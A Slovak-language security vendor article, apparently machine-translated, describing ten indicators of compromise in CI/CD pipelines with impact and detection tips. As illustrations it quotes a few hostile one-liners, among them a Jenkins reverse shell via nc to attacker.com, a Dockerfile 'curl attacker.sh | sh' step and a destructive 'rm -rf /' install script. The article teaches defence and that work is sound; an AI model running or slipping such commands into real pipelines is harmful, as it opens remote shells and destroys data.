10 najdôležitejších ukazovateľov kompromisu v CI/CD Pipelines

Úvod: Aké sú indikátory kompromitácie v kybernetickej bezpečnosti?

Indikátory kompromitácie sú prvými varovnými signálmi, že váš systém alebo pipeline môže byť pod útokom. Jednoducho povedané, indikátory kompromisu sú stopy, ktoré zanechali útočníci, ako zvláštne logins, zmeny súborov alebo skrytý malware. V Kybernetická bezpečnosť MOV, fungujú ako odtlačky prstov na mieste činu a poskytujú vám jasný dôkaz, že niečo nie je v poriadku. Preto, keď sa vývojári pýtajú aké sú indikátory kompromisu, odpoveď sa neobmedzuje len na servery alebo firewally, zahŕňa aj riziká skryté v moderných CI/CD pipelines.

V týchto pipelineÚtočníci môžu manipulovať s kódom, vkladať škodlivé závislosti alebo meniť kroky zostavovania bez toho, aby si to všimli. Väčšina sprievodcov sa však stále zameriava iba na servery alebo siete. V dôsledku toho sa dodávateľský reťazec softvéru stal jedným z najľahších cieľov.

Preto je potrebné nájsť indikátory kompromisu v CI/CD pipelines je nevyhnutný. Predovšetkým pomáha tímom blokovať malvér, chrániť tajomstvá a zabezpečiť každý krok dodávania softvéru.

10 najdôležitejších ukazovateľov kompromisu v CI/CD Pipelines

Pri vysvetľovaní indikátorov kompromitácie sa väčšina zoznamov zameriava na servery alebo siete. Napriek tomu v CI/CD pipelineÚtočníci zanechávajú veľmi odlišné odtlačky prstov. Rozpoznanie týchto signálov je kľúčové pre proaktívnu obranu. Nižšie je uvedených 10 varovných signálov kybernetickej bezpečnosti podľa IOC, na ktoré by si mal dávať pozor každý vývojár a bezpečnostný inžinier.

1. Podozrivé zmeny závislostí

Jedným z hlavných ukazovateľov kompromisu v pipelines je náhla a zvláštna aktualizácia závislostí. Útočníci často zneužívajú dôveru, ktorú vývojári vkladajú do správcov balíkov, na pridávanie nebezpečných balíkov.

Napríklad v npm a package.json rozdiel môže náhle zahŕňať:

Takéto zmeny môžu vyzerať bezpečne, ale môžu do každej zostavy vložiť kód nakazený trójskymi koňmi.

vplyv: Napadnuté zostavy zdedia malvér priamo pri zdroji.

detekcia: vynucovať kontrolu závislostí, sledovať rozdiely v uzamykateľných súboroch a neustále skenovať nové balíky.

2. Zahmlený kód v zostaveniach 

Autori škodlivého softvéru sa spoliehajú na zahmlievanie, aby obišli kontroly. V dôsledku toho je tento indikátor kompromitácie v CI/CD pipelines môže byť jedným z najťažšie odhaliteľných. V skutočnosti sa zahalené užitočné zaťaženia často bez upozornenia dostanú do open source knižníc alebo kontajnerových obrazov.

Napríklad:

  • Balík PyPI používajúci base64.b64decode("cHJpbnQoSGFja2VkKQ==").
  • Obraz Dockeru nabitý nepotrebnými binárnymi súbormi UPX.
  • JavaScript plný \x41\x42 uniká skrývajúcim sa zlodejom poverení.

vplyv: Skrytý kód sa počas zostavovania alebo behu vykonáva ticho, čo z neho robí kritický signál v kybernetickej bezpečnosti IOC.
detekcia: Kombinovať SAST s skenovaním škodlivého softvéru na označenie zakódovaného alebo zabaleného kódu. Predovšetkým berte obfuskaciu ako varovný signál, ktorý si zaslúži ďalšie vyšetrovanie.

3. Odhalené tajomstvá v Gite: Klasické kybernetické riziko IOC

CI/CD pipelineČasto dedia tajné údaje priamo z repozitárov. Avšak keď sa tajné údaje objavia v Gite, stávajú sa jednou z najjasnejších odpovedí na otázku „aké sú indikátory kompromisu v pipeline„Akonáhle sa prihlasovacie údaje dostanú do systému Git, útočníci ich môžu zneužívať donekonečna.

Napríklad:

  • A .env súbor obsahujúci AWS_SECRET_KEY=.
  • Vložené žetóny config.json.
  • Tajomstvá sú stále viditeľné v histórii Gitu aj po odstránení.

vplyv: Odhalené kľúče poskytujú útočníkom priamy prístup k CI/CD pipelines, cloudové systémy alebo databázy. Toto je preto jeden z najnebezpečnejších indikátorov kompromitácie.
detekcia: Použitie pre-commit hooks a úlohy CI pre tajné skenovanie a okamžite zrušiť uniknuté kľúče. Okrem toho vynútiť automatickú nápravu na zníženie časov expozície.

4. Manipulované Pipeline Konfigurácie: Skryté indikátory kompromitácie

Pipeline konfigurácie sú cieľmi s vysokou hodnotou, pretože jediná úprava často naruší celý pracovný postupV dôsledku toho boli manipulované pipeline Súbory predstavujú hlavné kybernetické riziko pre IOC, ktoré tradičné monitorovacie nástroje zriedkakedy odhalia.

Napríklad:

  • V akciách GitHubu:

  • V GitLabe: pridaná škodlivá úloha .gitlab-ci.yml ktorý odstraňuje citlivé údaje.
  • V Jenkinsovi: sh "nc -e /bin/bash attacker.com 4444".

vplyv: Tieto neschválené zmeny zmenia vaše pipeline do permanentných zadných vrátok pre útočníkov, čo sa jednoznačne počíta ako indikátor kompromitácie.
detekcia: Vynucovať podpísané konfigurácie, vyžadovať schválenia PR a monitorovať neočakávané úlohy. Okrem toho nastaviť guardrails ktoré automaticky blokujú zmenené pracovné postupy.

5. Privilegovaný IaC Predvolené 

Nesprávne nakonfigurované definície infraštruktúry často vytvárajú skryté zadné vrátka. V dôsledku toho privilegované predvolené hodnoty v IaC sú klasickým kybernetickým rizikom MOV.

Napríklad:

  • Nasadenie Kubernetes udeľujúce pody privileged: true.
  • Helmove grafy odhaľujúce služby s 0.0.0.0:22.

vplyv: Útočníci získajú prístup na úrovni root alebo verejne sprístupnia interné služby. V dôsledku toho tieto problémy výrazne rozširujú oblasť útoku.
detekcia: Aplikovať IaC skenovanie s cieľom vynútiť si čo najnižšie privilégiá pred zlúčením. Okrem toho sa uistite, že každá konfigurácia je skontrolovaná ako súčasť pipeline.

6. Nezvyčajné správanie zostavy 

Útočníci často menia pipeline správanie, ktoré by mohlo spôsobiť škodlivé akcie. Inými slovami, nezvyčajná aktivita zostavovania je jednou z najjasnejších odpovedí na otázku, čo sú indikátory kompromitácie v CI/CD pipelines.

Napríklad:

  • Zostavy odosielajúce sieťové požiadavky do cudzích domén.
  • Projekt Node.js náhle spustil PowerShell počas npm install.
  • Úloha CI sťahuje veľké binárne súbory, ktoré nie sú definované v skriptoch zostavovania.

vplyv: Napadnuté zostavy môžu slúžiť ako distribučné body malvéru. Predovšetkým šíria škodlivé dáta v rámci každého nasadenia.
detekcia: Monitorujte protokoly zostavenia, či neobsahujú neočakávané procesy alebo pripojenia. Okrem toho nakonfigurujte detekciu anomálií na označenie správania mimo normy.

7. Škodlivé skripty balíkov ako riziká kybernetickej bezpečnosti IOC

Životný cyklus podpory správcov balíkov hooks ktoré útočníci zneužívajú. Škodlivé skripty v npm, PyPI alebo Dockerfiles sú preto silnými indikátormi kompromitácie.

Napríklad:

  • npm: postinstall spustený skript rm -rf / alebo navigácia smerom k C2.
  • PyPI: setup.py spustenie skrytého kódu Pythonu pri inštalácii.
  • Dockerfile: RUN curl attacker.sh | sh.

vplyv: Útok sa spustí počas inštalácie, pred akýmkoľvek testovaním za behu. Vývojári si to preto nemusia všimnúť, kým nie je príliš neskoro.
detekcia: Skenujte manifesty balíkov a hľadajte inštalačné skripty. Okrem toho obmedzte rizikové hooks in CI/CD pracovné miesta na zníženie expozície.

8. Indikátory kompromitácie v registri

Útočníci nahrádzajú alebo upravujú artefakty v registroch a tieto udalosti sú učebnicovými príkladmi toho, čo sú indikátory kompromitácie v dodávateľskom reťazci. pipelines.

Napríklad:

  • Značka obrázka Dockeru bola ticho aktualizovaná vrstvou napadnutou trójskym koňom.
  • Interný balík nahradený infikovanou verziou.
  • squatting menného priestoru npm, ako napríklad lodash-proxy.

vplyv: Každá zostava používajúca artefakt registra je ohrozená. Nielen to, ale ohrozenie sa rozšíri aj na následné služby.
detekcia: Vynucujte kontroly podpisov a integrity pri všetkých stiahnutiach z registra. Okrem toho sledujte pôvod artefaktov pomocou SBOM validácia.

9. Anomálna aktivita používateľov ako dôkaz IOC

Kompromitované účty takmer vždy zanechávajú abnormálne stopy. Nezvyčajné správanie vývojárov je preto silným indikátorom kompromitácie.

Napríklad:

  • Commits odsunutým o 3:00 miestneho času.
  • Schválenia PR účtami na dovolenke.
  • Pipelinespúšťané s nezvyčajnou frekvenciou.

vplyv: Útočníci zneužívajú ukradnuté prihlasovacie údaje na vkladanie škodlivých zmien. Koniec koncov, neoprávnené commitľahko sa začlenia do bežných pracovných postupov.
detekcia: monitor SCM aktivitu pre anomálie, presadzovať viacfaktorovú autentifikáciu (MFA) a pravidelne rotovať tokeny. Okrem toho upozorňovať na podozrivé commit alebo vzorce schvaľovania.

10. Zlyhanie kontrol integrity alebo podpisov v kybernetickej bezpečnosti IOC

Bežný, ale ignorovaný indikátor kompromisu je neúspešná kontrola integrity alebo podpisu. V kybernetickej bezpečnosti IOC tieto kontroly overujú, či sú kód alebo artefakty autentické. Ich preskočenie ponecháva pipelineje vystavený.

Príklady:

  • Haš SHA256 nezodpovedá očakávanému kontrolnému súčtu.
  • Chýbajúci alebo neplatný GPG podpis.
  • An SBOM zobrazujúce nepodpísané artefakty.

vplyv: Poruchy integrity často znamenajú manipuláciu, otravu registra alebo vniknutie škodlivého softvéru.

detekcia: Automatizujte kontroly podpisov, vynucujte overovanie kontrolných súčtov a blokujte nepodpísané komponenty. Predovšetkým však každú neúspešnú kontrolu považujte za jasný dôkaz kompromitácie.

CI/CD Ukazovatele kompromisu v skratke

Indikátor kompromisu (IOC) Vplyv na CI/CD Pipelines Ako zistiť
Podozrivé zmeny závislostí Útočníci vkladajú škodlivé knižnice do správcov balíkov, čo vedie k napadnutiu zostavení. Sledujte rozdiely v uzamykateľných súboroch, vynucujte kontrolu závislostí a priebežne skenujte závislosti.
Zahalený kód v zostaveniach Skryté užitočné zaťaženia sa vykonávajú počas zostavovania alebo behu bez detekcie. Použitie SAST a skenovanie škodlivého softvéru na označenie vzorov kódu base64, hexadecimálneho alebo zbaleného kódu.
Odhalené tajomstvá v Gite Uniknuté tokeny alebo kľúče API poskytujú útočníkom priamy prístup ku kritickým systémom. Spustite tajné skenovania v Gite hooks a automaticky zrušiť uniknuté prihlasovacie údaje.
Manipulované Pipeline konfigurácia Upravené pracovné postupy umožňujú exfiltráciu alebo perzistenciu údajov vo vnútri CI/CD. Vyžadovať schválenia PR, vynucovať podpísané konfigurácie a monitorovať pipeline zmeny.
privilegovaný IaC Predvolené Príliš tolerantné role alebo nezabezpečené predvolené nastavenia vystavujú cloudové prostredia riziku. Skenujte súbory Terraform, Kubernetes a Helm, aby ste zistili, či majú najmenej oprávnení.
Nezvyčajné správanie zostáv Pipelinepoužívajú sa ako distribučné body malvéru alebo na laterálny pohyb. Analyzujte protokoly zostavenia, či neobsahujú neočakávané sťahovania, procesy alebo odchádzajúce hovory.
Škodlivé skripty balíkov Skryté skripty pred/po inštalácii spúšťajú užitočné zaťaženia pred testovaním za behu. Blokovať rizikové skripty npm/PyPI a obmedziť ich vykonávanie v CI/CD pracovných miest.
Otrava registra Artefakty nahádzané trójskymi koňmi nahrádzajú dôveryhodné obrazy alebo binárne súbory v registroch. Overujte kontrolné súčty, vynucujte overovanie podpisov a proaktívne skenujte registre.
Anomálna aktivita používateľov Kompromitované účty odosielajú škodlivý softvér commitalebo spúšť pipelines. Presadzovanie viacstrannej finančnej pomoci, monitorovanie commits pre anomálie a analyzovať login vzory.
Neúspešné kontroly integrity alebo podpisu Označuje manipulovaný kód, závislosti alebo obrázky vstupujúce do pipeline. Automatizujte kontroly integrity a blokujte nepodpísané alebo nezhodné komponenty.

Prečo tradičná kybernetická bezpečnosť MOV zlyháva CI/CD Riziká

Väčšina organizácií už monitoruje indikátory kompromitácie na serveroch, počítačoch alebo sieťach. Tento klasický prístup ku kybernetickej bezpečnosti IOC však ignoruje... CI/CD pipelines, ktoré sú teraz jedným z najdôležitejších útočných povrchov. V skutočnosti, pipelinevykazujú jedinečné signály kompromitácie, ktoré tradičné nástroje nedokážu rozpoznať.

Indikátory kompromisu v tradičnej bezpečnosti

V konvenčnej kybernetickej bezpečnosti IOC sa zvyčajne kladie dôraz na:

  • neobvyklý loginalebo IP adresy, ktoré naznačujú ukradnuté prihlasovacie údaje.
  • Podozrivé haše súborov alebo zmeny v registri, ktoré odhaľujú škodlivý softvér.
  • Neočakávaná odchádzajúca prevádzka, ktorá poukazuje na únik údajov.

Ide o dobre známe ukazovatele, ktoré sa sledujú aj v Rámec MITRE ATT&CK, ktorý mapuje bežné správanie a taktiky protivníkov. Sú to užitočné signály. Vzťahujú sa však najmä na operačné systémy alebo podnikové siete. V dôsledku toho prehliadajú jemné manipulácie, ku ktorým dochádza skôr v dodávateľskom reťazci softvéru.

Prečo CI/CD Pipelinesú odlišné

CI/CD pipelinesú automatizované prostredia, kde vývojári commit kód, závislosti na vyžiadanie a vydania zostavení. Útočníci vedia, že jedno ohrozenie sa tu kaskádovito prenáša na každé nasadenie. Aké sú teda indikátory ohrozenia v CI/CD pipelines? Vyzerajú veľmi odlišne:

  • Škodlivá závislosť ticho pridaná do súboru package.json alebo requirements.txt.
  • Kľúče alebo tokeny API sprístupnené v Gite commitsúbory s alebo .env.
  • Zahalený kód vložený do balíkov npm alebo PyPI.
  • Súbory Terraform alebo Kubernetes s nezabezpečenými predvolenými hodnotami, ako napríklad privileged: true.
  • Pipeline úlohy upravené s cieľom odhaliť údaje alebo otvoriť zadné vrátka.

Tieto kompromisné signály v CI/CD zostať neviditeľný pre standard bezpečnostné nástroje.

Medzera v kybernetickej bezpečnosti MOV

Hoci mnohé tímy chápu hodnotu indikátorov kompromitácie, stále sa spoliehajú iba na detekciu zo serverov a sieťových protokolov. Útočníci preto môžu otráviť zostavy alebo vložiť malvér bez toho, aby zanechali bežné stopy. Preto incidenty, ako napríklad zadné vrátka XZ Utils alebo škodlivé balíky npm, zostali nezistené, až kým sa nedostali do produkčného prostredia.

Tieto druhy kompromisov v dodávateľskom reťazci sú tiež zdôraznené CISPokyny pre bezpečnosť dodávateľského reťazca spoločnosti A, ktorý varuje, že útočníci sa čoraz častejšie zameriavajú CI/CD pipelinea registre.

Jedlo sebou

Tradičná kybernetická bezpečnosť IOC je nevyhnutná, ale nestačí. Tímy musia predovšetkým rozpoznať indikátory kompromitácie špecifické pre danú oblasť. CI/CD pipelineIba potom dokážu odhaliť škodlivý kód alebo pipeline zneužívanie skôr, ako sa rozšíri v rôznych prostrediach.

nástroje na analýzu zloženia softvéru SCA
Stanovte si priority, odstraňujte a zabezpečte svoje softvérové ​​riziká
Získajte svoj bezplatný účet.
Nie je potrebná kreditná karta.

Zabezpečte si vývoj a dodávku softvéru

s produktovým balíkom Xygeni